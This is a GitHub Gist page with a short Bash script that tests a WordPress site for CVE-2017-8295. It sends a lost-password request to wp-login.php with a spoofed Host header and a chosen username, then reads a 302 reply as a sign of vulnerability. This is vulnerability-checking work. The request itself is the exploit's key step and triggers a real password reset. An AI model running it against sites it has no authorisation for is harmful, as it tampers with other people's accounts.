Forked from stevegrunwell/wordpress-host-checker.sh
Created
February 15, 2018 20:49
-
-
Save alexnitta/91aef35acea1d59f736ba7c9c644308a to your computer and use it in GitHub Desktop.
Simple Bash script to test against https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env bash | |
| # | |
| # Check a WordPress domain against CVE-2017-8295. | |
| # https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html | |
| # | |
| # Usage: | |
| # ./wordpress-host-check <domain> <username> | |
| # | |
| # <domain> | |
| # The WordPress domain you wish to check. For example, http://example.com. | |
| # | |
| # <username> | |
| # The WordPress username you wish to attempt a password reset for. | |
| # | |
| # Author: Steve Grunwell (https://stevegrunwell.com) | |
| # Link: https://stevegrunwell.com/blog/keeping-wordpress-secure/ | |
| # License: MIT | |
| echo -e "\nAttempting to reset the password for '$2' on $1:"; | |
| RESPONSE=$(curl --write-out %{http_code} --silent --output /dev/null \ | |
| -X POST "$1/wp-login.php?action=lostpassword" \ | |
| -H 'cache-control: no-cache' \ | |
| -H 'content-type: application/x-www-form-urlencoded' \ | |
| -H 'host: example.com' \ | |
| -H "origin: $1" \ | |
| -H "referer: $1/wp-login.php?action=lostpassword" \ | |
| -d user_login=$2) | |
| # A 302 response indicates the user was redirected to the confirmation screen. | |
| if [ "$RESPONSE" == "302" ]; then | |
| echo -e "> Uh oh, it appears that $1 may be vulnerable!\n" | |
| else | |
| echo -e "> Good news! $1 appears to be safe from this exploit.\n" | |
| fi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment